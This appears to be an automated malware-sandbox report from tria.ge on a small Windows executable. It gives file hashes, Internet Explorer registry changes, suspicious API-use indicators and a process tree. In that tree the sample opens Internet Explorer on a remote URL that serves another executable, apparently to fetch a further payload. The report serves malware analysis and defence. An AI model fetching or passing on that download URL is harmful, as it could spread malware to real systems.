Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
15/07/2024, 01:44
Static task
static1
Behavioral task
behavioral1
Sample
47b39b803136fcee597572e7ddaf5072_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
47b39b803136fcee597572e7ddaf5072_JaffaCakes118.exe
Resource
win10v2004-20240709-en
General
-
Target
47b39b803136fcee597572e7ddaf5072_JaffaCakes118.exe
-
Size
91KB
-
MD5
47b39b803136fcee597572e7ddaf5072
-
SHA1
a74a4b8ab183bdd65fdc138b74dc18689f28cb26
-
SHA256
a942731da54942aa10097710c8bba02ddbdfac7337ee5ec05c375c0a7b126466
-
SHA512
e6c20f5e5559f27ff6c7c7ef091bd59820743f46a0b7ba211620a1332deaf860f1ce6c162a558087e400f7966ec8be5de4988dbe65b9555d256369dca328de84
-
SSDEEP
1536:cP4izDTGEmRTQswFYOXwY7EjTWdcT8F5Tk6mQKzBZgm/4:cPL7GM7XD7LdrF5TpKZgd
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002aec918cb9fa9248b7812ac80df2e74c00000000020000000000106600000001000020000000bae7862c598215c35108ccf1c2d97880885f034bfb49edca20e39f0bdb3adf8d000000000e8000000002000020000000d85db25f023782c98496ca2eac1032f30971dee77c7aec2dacc0b8f926007529200000007733366fb0aae50306b6f2ea897b784991d3ccc98f03bf1830d8fd3188416a794000000004153e37594378c7074d781196de62bd64a187734b00b3ff4ad648de449c3e24741fad5c4b2cddf544856e56a0f55f48f2e2dd886c6bbc0400527835d7806c9b iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D4DED341-424B-11EF-8420-FA57F1690589} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "427169761" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002aec918cb9fa9248b7812ac80df2e74c000000000200000000001066000000010000200000003f61800b4335bfcd515b02892abb9055abfc0db28b8e69b58cf33b31e63b1062000000000e80000000020000200000008b4d4e43fab1294f8817c79afd31c8e93943e4a0c877970a795603e2ec8e08189000000009ea969d0d921c1d7fc23536435427f5252cbd0275cb95f2aacf9d3f253730972feac02374e8aae46ae08ee08ac6611d89630c58f8f8f81945e0f834a7989b50d3e0ad85431d398a3db760e902ee93367ebecfe8b7cc0437b50eab7515417bbbfb8a2c2a019d410fe2fc1b1cf488a98121a32823ba8c1129193ac292c9b860e9c7dbda92938afa2bdc1952c85c1c73bc400000009e89c7e2943ee5a9def4555c7fdc8696aa2be7504bc0dc5a93d1260580a8dad8ec04be58e34beb8b03138ec877f9ade10e3e83079a6d7203e9277cb5380b3b40 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b003d4ad58d6da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 836 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 836 iexplore.exe 836 iexplore.exe 1712 IEXPLORE.EXE 1712 IEXPLORE.EXE 1712 IEXPLORE.EXE 1712 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2064 wrote to memory of 836 2064 47b39b803136fcee597572e7ddaf5072_JaffaCakes118.exe 30 PID 2064 wrote to memory of 836 2064 47b39b803136fcee597572e7ddaf5072_JaffaCakes118.exe 30 PID 2064 wrote to memory of 836 2064 47b39b803136fcee597572e7ddaf5072_JaffaCakes118.exe 30 PID 2064 wrote to memory of 836 2064 47b39b803136fcee597572e7ddaf5072_JaffaCakes118.exe 30 PID 836 wrote to memory of 1712 836 iexplore.exe 31 PID 836 wrote to memory of 1712 836 iexplore.exe 31 PID 836 wrote to memory of 1712 836 iexplore.exe 31 PID 836 wrote to memory of 1712 836 iexplore.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\47b39b803136fcee597572e7ddaf5072_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\47b39b803136fcee597572e7ddaf5072_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vse-oshibki.ru/data/setup_926268.exe2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:836 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1712
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD502311759bc668ba3feec760fd5d93f57
SHA1d05010cd51fb6b18afc86155ca5bb9ffb600bbb5
SHA256a8f6f6baa01ae1c42de28f55e880ac75105ba6047f43722a8964059f5dc2be8b
SHA512cf1f194050c3d256d31351bc2a747246b50a72120056c335dcdbbb6b548e0c02fbc41e8d6c096b6e0621a5501337f6aaa58725218c2a0f6a8ad6fea38869fceb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD55910a8b29ff266a04c768aec2062c53d
SHA181339b44c11a4c7bde3b9f3663dbfce18b11ff39
SHA256d9a4ed182cb31ba934835e9b43425e45e184aec6f340dfc2d5074e5ff2bc8eee
SHA512a7078a43129f3805ffa2ef082e8a043258847e648eb19ee939203f04a528489c94c9b7988c7030bc5ee02d12d20fd046d7376ed8ec3520505216d56873cf3436
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5ecc5263d6baef1b24f42c4e10b0f98a9
SHA10e83d38c1135f7f0fde5d372397e05180ee036a5
SHA256521dc000246c05fe42189e8d56592329a8fc79c645fae3934feb9816331e58a4
SHA5122628781a4352777bd0db71d48d73671ae4353a7f18366663a2a96bffa9822c4be2fb5b602ba972e1871551c827ebce753b8fcadba4f6c9b6fdc4cdd3f733b1f5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD551fb70a88eaace4dfa2c5fe21986924b
SHA18452f847692450926599c103891cc588b25bd37b
SHA256c7c3b2d04a3ec4ad84c02655337e05a90f493d42af1e02e4e4fc61abb0933a67
SHA5121016802d39c10451c6aff869b0b63cb3c8322e2256059149a5b1768e77119a5ecf7dcef8ee5ef479e2ade5ad8467f9e097a57813f54826dab3cb73a7de4c67e0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD56226d1f401e59e309e5bb36713367780
SHA19a9499c5a8bf3c1951b2be0bc4f3b7263197e081
SHA2561fd185c4e311a08b7f9a6589c622fd30300a3729a6ccf7bb3ed5ae56e870222e
SHA5120ac783c4a3339654b0becdfe54149a5a0d783a037a7410c303281634a4e8e9db74fb86fd4209c81e9a794a323116ce11840a7e0a55fb1f9aaa55c9bd09bab0ff
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5c628764250553092b273b8662fddae8e
SHA1b775cec8d46792e5cd48fc87a449e32ab5dfe02c
SHA25670df4e652ae5624aa9755e04e02e44016c15c60301baf6cd56485cd0e689c230
SHA512d1ec5571629c8c0d7aa1a1a48bc054ae82c59ab785c45266e33f5c411ac0989d28b8b757a11617e44d3a6d1383e927a45ce1dfd0193aaab884485dc80e79e00a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5f8a1aa2e248537395bf851a93ac7321e
SHA17ddd9ef5dd4efb5b3a1dae2f1b00436a530e9e61
SHA256ccc713ec996da193b78ae91a48c5e4dd3cd2cf05861e93498cb93947db68d58c
SHA512ad6fac4ca2cc4e5565516c73f65b61ff278378693afa8926935ef247f9249eb3962df189cc3630df8478743a721cf3d949b70dc79d57b1fbe71b60832c1c18b5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5d7c968c3f6500884dd61b59de91eaa6a
SHA16efbebd2fa83fd006da889af6bdb937d0e971c90
SHA2567bb1e6c10da3fcb5878fe39e98c5bfba705a41c9425aee3d780edded8576572c
SHA5122a36bb3dbd23fab1b0eb0afa72358ba34c5a6569e871bb90bc3f1112414e68bbb49bd45bba6fd0884fb06b18f1af811d64687b35452a7e96895877be1e1b1a03
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD542909dc6f458f25dc140d50a2616025b
SHA1044969b2efeeba438927ceaab88673454b91ee3b
SHA256aea533bf46f5a0bad58ff370e7d24e067f40d52f53f3e926b18f0fee1ed53953
SHA512afa2d7cb4bc83cc794712fc70d1951633e08e9ea443d8d3bfaa2ff003df8793599460954a2e6d327d31d60a7aeee3b4b468329a0a4c59f6da9ff7090746c7803
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5bb55c61197f51e27dbe5edb7f0c29d61
SHA1559445e9cf25dc38b26f6879346116c3e5d8022f
SHA256877d496a06770548dc9255142ca6f718c6b29ab4a478446f3f65c2c9df24ebe8
SHA512953334501718e7166bb0e5767695e48e24d0a799ae25ac2db4a2aeed1cef76482bb46282ad0a1e430a82468dbd7ed3dd9e7f2a1de0eace89aa89139e228d94e1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5387580a25b9dcde87b8df586534278cb
SHA13abe7aec8dd7024231dca69ffc61c711646f5b8e
SHA25612b2e0b595474ea71babf9c71867c3acc3e202395951c39e3acef1a66b975e77
SHA5121e3cd343edd9a8037da9dff7cbafa9f2d8c89192f21803950b10f9382c0eb7a8bad38d56a41f85ed2798fb6783ec2c8e6b152803823cb6416c2be3d39c351599
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD593344098c3d53112f6e1511a504ba277
SHA1e58fa44f93120ce8b1a4cf24bfb3b29f0935b1b9
SHA2561fda7e7fba8233e4799842ccbbeefa4bd4b3250d2071cb1e6486034b1eef776f
SHA51213f045bb0a138848eb95b15e7183af4bff22c9086fb50b227f8abcb20da6979ded79e581b5f6169cb21286a6205c9c79c63f6735a4b7b689baf973ec570f0428
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD53aeb1c6d7a10784c300527fb78a0437b
SHA11399176fb3cfefd71f0c246d7209088ee606d932
SHA256114d588c60e93319ffdedd3ee5a4b4e0bc609a78ad2fb6dd198eb7ce9922fd4d
SHA5129a12b1964ff5562b0616f61d9900af5be4a8620ca3519b123d4c5e48113a35a5acb39aa3497cf19e82dc5c478fdc42430f0b8c79d9dbfddeb5f71bde40f01156
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5c50b0c28697a456ecd383988ea0234c1
SHA172fca4d61a48313539ab2264d0996efb26e3218f
SHA256243beb14e40d8bbed0c6e3911075272545a7e5a08255bd75b26fcbd8acb3952e
SHA51296073d42ebcd118164805d3899c285bae801c49e23164506f578802bf552c394f147651ef5354e34872931b660903711c6f2a9838f9c6a7160dc0de52ae732e5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD51ac8e5a38719deedfca1cdf62f991c03
SHA1c0076142fd0d48f94d8471808ffe4298e339534b
SHA256c8536b22e46f621e9c3a50e661699f2a765bd48781f7bf1454bf71c8feb372cb
SHA512e816dcc7dce17b614c544fb4f4fdc32d1520ecb4f411519b7aece7799add88995d39e8d97e50b7a134d9a2ee7851325285fd5c45a25421cb547ed53ffb79ebf5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD56ffbf65d76db701499b519073c85bf49
SHA19aa936ebfab1f3724b4c267e4e34fabee7194943
SHA25677aadf212625975fb1165a50b94a1c87dd4cd9a59241d0f87c799cbb7a66a246
SHA512f522552b92ad9ad4058f022f678b634b1b69d58bf3205c5a7c11dc2f1b1cd596cc22e515cdb7e13f4c921beeae1d256159e79234575a98fe4be7a307dcceee6b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD598249bac0490f9980e69747e48a4ed41
SHA14204190786e9a23f3346cb2648a2f46879d3ee35
SHA25687c37e4f4156f62cb2550c576866f8a69d758877b74997d456b6864611989f50
SHA512c6efd9f89dfcf445b130f2645a123f4adb2833b89f3beb73cbec4435d2445f8274ac3d7339ee5472c7ce8f538253e13cbf0416bbcf39e5b043336b6826dedb6d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD56e6c6c208cfe8a89b045b90960ebde0c
SHA150659dc07042adcb2bbc7b729a93f7a47bd43be2
SHA25651658c60e7432a0f59900fbe040f1a8ad450172fff580b1a4a030e114a97c105
SHA512915c0dc001dca526017bb3d6c4cb75b53c66b0b6a4f0b47bfb4c12e1fe9c53dab354ce239176c435591e2b1193df267ef1af1393714675669815271c5e4d2817
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD532f332da3b517cfd6f83adbcc10784c0
SHA167c940ad8b1143ddf51876563df04a4c8a1195ca
SHA2565200e2ec9c4dffdbf3179feda137be259c9370f65d3cfcc081a506ad6c74ef7d
SHA512c7d46aaac575282b4035d7d5932ed5f68a159d7e1134fe9ead14096b8b5584778b14f56fa1c58c7873ada3549cf777b7778dc29ea76a80241953d8d75b24bd1a
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b